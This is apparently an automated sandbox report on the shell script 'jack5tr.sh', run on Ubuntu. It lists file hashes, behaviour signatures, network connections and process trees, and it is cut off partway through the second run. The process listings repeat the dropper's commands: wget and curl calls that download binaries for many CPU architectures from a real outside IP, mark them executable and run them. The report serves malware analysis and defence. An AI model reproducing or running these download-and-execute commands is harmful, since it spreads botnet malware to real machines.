MD5 154506d20dcd8502b3820a2912b697e9
SHA1 55c207a1c0aeabc6df6d0307f11a03137139d701
SHA256 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c
SHA512 aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112

/tmp/x86_64

MD5 74eff98ceea934700653d0c0620419f8
SHA1 037df252464667dbcdc6f4fde3ff9043a3b76909
SHA256 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89
SHA512 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c

/tmp/mpsl

MD5 eba2a5a74d5beba7b9f903cfe07f9796
SHA1 012af86b452d7e7f82bbd45b5bbef672d2b25c67
SHA256 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea
SHA512 a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be

/tmp/arm

MD5 6b1fc0e45d31470659fe0e295bc63d4e
SHA1 ce54569f5eefe03f56d5df2df3fe4830b0c9f177
SHA256 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22
SHA512 f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea

/tmp/RUN

MD5 9c1344aa17dc266ff8f8637b2becfc46
SHA1 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee
SHA256 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4
SHA512 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1

/tmp/arm5

MD5 fc7db008f770f37ccb16e8d23f9780ae
SHA1 acd2865df9fec74fdafb227ce3136b715bb998b0
SHA256 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db
SHA512 c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c

/tmp/arm6

MD5 d6227412be050807781b974181739db6
SHA1 14d20849fc59a62ed7f713afda3d9dda4cc2c850
SHA256 e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09
SHA512 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76

/tmp/arm7

MD5 d0084c21e35f40b71450406d0298e622
SHA1 f2ce386f6ba9afdb7f95272ab867c913b0802cd9
SHA256 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f
SHA512 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727

/tmp/ppc

MD5 9b27ba0a33c0ecaf4c48bc1fdabf2538
SHA1 d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266
SHA256 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618
SHA512 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea

/tmp/spc

MD5 839129f80935155dff6a2db49753d6a9
SHA1 d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba
SHA256 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457
SHA512 ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3

/tmp/m68k

MD5 e6391e323b334b1257f36bb2fcb34e25
SHA1 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41
SHA256 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728
SHA512 b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958

/tmp/sh4

MD5 f26f51b05d46bea29bcab58abb1a9ec1
SHA1 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf
SHA256 ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466
SHA512 b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea

Analysis: behavioral7

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

ubuntu2004-amd64-20240611-en

Max time kernel

6s

Max time network

180s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/usr/bin/cat

[cat x86]

/usr/bin/chmod

[chmod +x config-err-YYA4jL jack5tr.sh RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mips]

/usr/bin/curl

[curl -O http://193.37.59.116/mips]

/usr/bin/cat

[cat mips]

/usr/bin/chmod

[chmod +x config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arc]

/usr/bin/curl

[curl -O http://193.37.59.116/arc]

/usr/bin/cat

[cat arc]

/usr/bin/chmod

[chmod +x arc config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/x86_64]

/usr/bin/curl

[curl -O http://193.37.59.116/x86_64]

/usr/bin/cat

[cat x86_64]

/usr/bin/chmod

[chmod +x arc config-err-YYA4jL jack5tr.sh mips RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/mpsl]

/usr/bin/curl

[curl -O http://193.37.59.116/mpsl]

/usr/bin/cat

[cat mpsl]

/usr/bin/chmod

[chmod +x arc config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm]

/usr/bin/curl

[curl -O http://193.37.59.116/arm]

/usr/bin/cat

[cat arm]

/usr/bin/chmod

[chmod +x arc arm config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm5]

/usr/bin/curl

[curl -O http://193.37.59.116/arm5]

/usr/bin/cat

[cat arm5]

/usr/bin/chmod

[chmod +x arc arm arm5 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm6]

/usr/bin/curl

[curl -O http://193.37.59.116/arm6]

/usr/bin/cat

[cat arm6]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/arm7]

/usr/bin/curl

[curl -O http://193.37.59.116/arm7]

/usr/bin/cat

[cat arm7]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/ppc]

/usr/bin/curl

[curl -O http://193.37.59.116/ppc]

/usr/bin/cat

[cat ppc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl ppc RUN snap-private-tmp ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/spc]

/usr/bin/curl

[curl -O http://193.37.59.116/spc]

/usr/bin/cat

[cat spc]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh mips mpsl ppc RUN snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/m68k]

/usr/bin/curl

[curl -O http://193.37.59.116/m68k]

/usr/bin/cat

[cat m68k]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh m68k mips mpsl ppc RUN snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

/usr/bin/wget

[wget http://193.37.59.116/sh4]

/usr/bin/curl

[curl -O http://193.37.59.116/sh4]

/usr/bin/cat

[cat sh4]

/usr/bin/chmod

[chmod +x arc arm arm5 arm6 arm7 config-err-YYA4jL jack5tr.sh m68k mips mpsl ppc RUN sh4 snap-private-tmp spc ssh-CtIa6Hesc4Zr systemd-private-2131a8123ede4b3da518e768658e36bc-colord.service-4QnN1h systemd-private-2131a8123ede4b3da518e768658e36bc-ModemManager.service-XCKBwi systemd-private-2131a8123ede4b3da518e768658e36bc-switcheroo-control.service-tzUM8h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-logind.service-9dxLXg systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-resolved.service-kIlJ7h systemd-private-2131a8123ede4b3da518e768658e36bc-systemd-timedated.service-GQPzhi systemd-private-2131a8123ede4b3da518e768658e36bc-upower.service-4Zcywi x86 x86_64]

/tmp/RUN

[./RUN]

Network

Country Destination Domain Proto
N/A 224.0.0.251:5353 udp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
NL 193.37.59.116:80 193.37.59.116 tcp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
US 1.1.1.1:53 connectivity-check.ubuntu.com udp
GB 185.125.190.48:80 connectivity-check.ubuntu.com tcp

Files

/tmp/x86

MD5 c4a3f27654d167d92ac6df60a02b40e2
SHA1 b1707a6ada4a6538e7595cbbdd2cd3b3d2294166
SHA256 9b31f7eb1e2b28c5497a06862119e0152893e8f80e2f5d508d3da577c3a5b100
SHA512 ee1fd253404678b44d026310d0ec655057602be0a83d2b9ae6e4eb0c357f74900fcaea430d8ced18d6debb8053bbdf4db39b7900b33080ce735ae87b25317f66

/tmp/mips

MD5 038943a024bba0e623ee0fc71c0e9dc4
SHA1 daaffb7cab5f0b1973d602b1f6d8c8f35600dc0b
SHA256 28686b90cfd05ece614f0d3b36993a64be26cd550d836c576b2622b2e1955dbb
SHA512 3e6c767298d62657a8217d4258bea76bbbb4abb0b85423045a2eca691399d56952abad3197f501f4bbf71eee2fc30fd017cec58171274bb6021789b597871b07

/tmp/arc

MD5 154506d20dcd8502b3820a2912b697e9
SHA1 55c207a1c0aeabc6df6d0307f11a03137139d701
SHA256 5937f6d6dadc5b9c5b3ad04297d3838d6c038ace39d0021b3055f09dd31d4c5c
SHA512 aeeb083e7bc6e5e8701572f91a5731148f1b93ebe3ab2ebd6d10526f08771601d6f79450f22a5cb03b2d05e54a4bb5fde176d541a6cbc5893d64f9b8621c0112

/tmp/x86_64

MD5 74eff98ceea934700653d0c0620419f8
SHA1 037df252464667dbcdc6f4fde3ff9043a3b76909
SHA256 7bf34fcdc8ad5964197369b95f1e05c98ac68890aa4a451204bac5a8a2426f89
SHA512 81f6a484bf3dddfa9c0b574f207accde90b631545907eb2d15565e6ffdbbb177c5c97733090a0cac83d775007256a4ff67848fbbe95faa19adb199a312a6573c

/tmp/mpsl

MD5 eba2a5a74d5beba7b9f903cfe07f9796
SHA1 012af86b452d7e7f82bbd45b5bbef672d2b25c67
SHA256 4c67bc4e9d0abfbccff5c49a713a3a4bfa11cdaa7a13a294733aedf9f5d7bcea
SHA512 a35aa4ebfab6a69a76a3ea31c52ba27f8a5b306b54ed1f732f18f8ad61f1dea57ea5af0354d604cfdb6769419e0a9a44f10545c1f1a27ad018ec730b9fb480be

/tmp/arm

MD5 6b1fc0e45d31470659fe0e295bc63d4e
SHA1 ce54569f5eefe03f56d5df2df3fe4830b0c9f177
SHA256 6f942d2d27fea02c90ec772b8523891771a1ae6c4f05eecc3e0e3d8fa4776f22
SHA512 f3a3cc1705764a3be4e725d10ae10710d4a09750e629c8cf07974907ac88858bfa54bc86cca6947e51de468fe654669b751c48ee2e234c53f4f001b29fdb9fea

/tmp/RUN

MD5 9c1344aa17dc266ff8f8637b2becfc46
SHA1 2dedb0abaf75446902f162dc8fc6e9b04fb9a8ee
SHA256 423e707b0c9e2d015f8f46df9053bbe469f240b7e1b5f9248f3172eecb36e4e4
SHA512 382a31d139ee354d0078c06de83a3cce1cfe568c45b0b6b6586e954d0fc048ded37227797fe078ffcdd5539c2f70fd8338b5b6d72fb3a3e7f22230deacbb1da1

/tmp/arm5

MD5 fc7db008f770f37ccb16e8d23f9780ae
SHA1 acd2865df9fec74fdafb227ce3136b715bb998b0
SHA256 857587a2dc176d97becbd0d400804245e392fd87f92bb7ace51865619eb0a7db
SHA512 c0e126cb47cbcd469d7b8b99ae7b5cb4cb25444adb91586acf02c36d9d21f221d897d0c2ba989371ea165a436ed49320219b074e5bb10afd0b2defb4319f097c

/tmp/arm6

MD5 d6227412be050807781b974181739db6
SHA1 14d20849fc59a62ed7f713afda3d9dda4cc2c850
SHA256 e559985c126f6872d3211cd971a7d8a64a6d17e247b5b14d0a7d85f9ad29ce09
SHA512 7a58d6d56f24f1064262de862372531e4cb7967373a4253a2ddc631a195373102fbc19178393f9c568b6b977641bf7bf5b283ca11f033f93fdadfa4789bc9c76

/tmp/arm7

MD5 d0084c21e35f40b71450406d0298e622
SHA1 f2ce386f6ba9afdb7f95272ab867c913b0802cd9
SHA256 9339521da875e8f082bd738ca8dc528d04ec605b19f46da59c55690f3bcd624f
SHA512 0f6618d607368f2251c48c9daa4d378ca89a6a053c7f5a981ad7e0d9683aa242d12f38b6f476dbbb36abd6ba2d627267cb3b9494bf3c4af40615c440be26f727

/tmp/ppc

MD5 9b27ba0a33c0ecaf4c48bc1fdabf2538
SHA1 d568ee55ba8476a9121f9f9c6dbe4e9e18cbb266
SHA256 6ad5fe25bc0730429eb72d60b5e841df775f5a6a08bc1c61edd182c7d9a41618
SHA512 1428b89fbf2b432783eeef4e1362c840d92072c73490bef5f6c13e14de1cb8e8260adc323bfd433992be158dfd284ba21cabba3404527638cdbcdbfabd86baea

/tmp/spc

MD5 839129f80935155dff6a2db49753d6a9
SHA1 d0f9e58eb29c5fcf88b4bbdfe7e447dd9ed9b8ba
SHA256 073994fa01d7e8d34a63c9e1a1a45005f52f387c1166768ef419afb911ad5457
SHA512 ef2ce2ebb97feb7d955cae8f3f85bea2ab02b312efad8580bd7efc92684dc6cb0343c2c8f561ad8c4a9e2e40580585754d0ea214099d37c862629c5bd8b913c3

/tmp/m68k

MD5 e6391e323b334b1257f36bb2fcb34e25
SHA1 1532d7dd78fb0b0263ee0df4ab3d007a68e45c41
SHA256 66d4651d0746e2ac8801b370c3600e91354b65746ff6b636930180682a5c1728
SHA512 b4bad5f003ccec3aaa5f412ffebec85d4fd0ba12d7a53abad056fc4a8ba7392967812b886d32ce2e54d28de018a39c51980a724149ab98b7c23b589a3f631958

/tmp/sh4

MD5 f26f51b05d46bea29bcab58abb1a9ec1
SHA1 8e527459d9d4c5c8b4ac161bdf36f56c89939fbf
SHA256 ace829355d3f8c1b1d22f8e634de8a0719d4e266b1f631d591cc1168f2ce4466
SHA512 b60304f2fb247d8a171490d88183c7b56ab9458c39dae0cbd255145c5e463f5c7d78dbcda73c04f2eb3e33cff003c061473d86bb821d60bac12353506281ccea

Analysis: behavioral9

Detonation Overview

Submitted

2024-08-29 19:31

Reported

2024-08-29 19:36

Platform

ubuntu2404-amd64-20240729-en

Max time kernel

2s

Max time network

131s

Command Line

[/tmp/jack5tr.sh]

Signatures

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A
N/A /tmp/RUN /tmp/RUN N/A

Reads runtime system information

Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/arm6 /usr/bin/curl N/A
File opened for modification /tmp/mpsl /usr/bin/curl N/A
File opened for modification /tmp/arm5 /usr/bin/curl N/A
File opened for modification /tmp/x86_64 /usr/bin/curl N/A
File opened for modification /tmp/arc /usr/bin/curl N/A
File opened for modification /tmp/arm7 /usr/bin/curl N/A
File opened for modification /tmp/ppc /usr/bin/curl N/A
File opened for modification /tmp/x86 /usr/bin/curl N/A
File opened for modification /tmp/mips /usr/bin/curl N/A
File opened for modification /tmp/arm /usr/bin/curl N/A
File opened for modification /tmp/spc /usr/bin/curl N/A
File opened for modification /tmp/m68k /usr/bin/curl N/A
File opened for modification /tmp/sh4 /usr/bin/curl N/A
File opened for modification /tmp/RUN /tmp/jack5tr.sh N/A

cURL User-Agent

Description Indicator Process Target
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A
HTTP User-Agent header curl/8.5.0 N/A N/A

Processes

/tmp/jack5tr.sh

[/tmp/jack5tr.sh]

/usr/bin/wget

[wget http://193.37.59.116/x86]

/usr/bin/curl

[curl -O http://193.37.59.116/x86]

/usr/bin/cat

[cat x86]

/usr/bin/chmod

